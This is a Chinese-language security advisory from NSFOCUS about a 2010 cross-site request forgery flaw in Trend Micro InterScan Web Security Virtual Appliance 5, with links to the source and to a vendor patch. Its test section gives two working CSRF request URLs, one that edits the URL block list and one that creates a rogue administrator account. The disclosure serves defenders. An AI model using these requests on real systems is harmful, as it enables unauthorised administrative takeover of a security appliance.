安全研究
安全漏洞
安全漏洞
所有系统
AIX
BSD(eg,OpenBSD)
Digital Unix
HP-UX
IRIX
Linux
FreeBSD
SCO UNIX
SunOS
Solaris
Windows
所有类型
远程进入系统
本地越权访问
拒绝服务攻击
嵌入恶意代码
Web数据接口
其他类型
趋势科技InterScan Web Security Virtual Appliance跨站请求伪造漏洞
发布日期:
2010-06-22
更新日期:
2010-06-23
受影响系统:
Trend Micro InterScan Web Security Virtual Appliance 5
描述:
BUGTRAQ ID:
41039
InterScan Web Security Virtual Appliance是一款能安装在VMware平台上的网页过滤产品。
InterScan Web Security Virtual Appliance代理服务器允许用户通过HTTP/HTTPs请求执行某些操作,如添加删除用户、添加删除可信任站点等。由于没有对请求执行任何有效性检查,用户登录到代理服务器后访问不可信任站点就会导致跨站请求伪造攻击,导致以该用户的权限执行各种非授权操作。
<*来源:Eric BEAULIEU (
eric.beaulieu@zebux.org
)
链接:
http://zebux.free.fr/index.php?option=com_content&view=article&id=555:interscan-web-security-virtual-appliance-cross-site-request-forgery&catid=16:sritnformatique&I
temid=40
http://secunia.com/advisories/40328/
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
将站点添加到阻断列表:
http://[IWSVA_Server]:1812/servlet/com.trend.iwss.gui.servlet.urllistset?op=urlblock&fromurl=%
2Furlblocking.jsp&daemonaction=2&urlb_enable_view=on&URL_blocking__enable=yes&oldurlbscan=yes&url_input=&url_type=website&importedfile=&blocklist=www.shinke
n-monitoring.org*
添加新的管理员账号:
http://[IWSVA_Server]:1812/login_account_add_modify.jsp?
op=add&userid=hacker_user&password_changed=true&PASS1=mypassword&PASS2=mypassword&desc=My_Hacker_user_account&access_rights=admin
建议:
厂商补丁:
Trend Micro
-----------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://downloadcenter.trendmicro.com/index.php?clk=tbl&clkval=250®s=NABU&lang_loc=1
浏览次数:
2587
严重程度:
0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障
关于我们
公司介绍
公司荣誉
公司新闻
联系我们
公司总部
分支机构
海外机构
快速链接
绿盟云
绿盟威胁情报中心NTI
技术博客
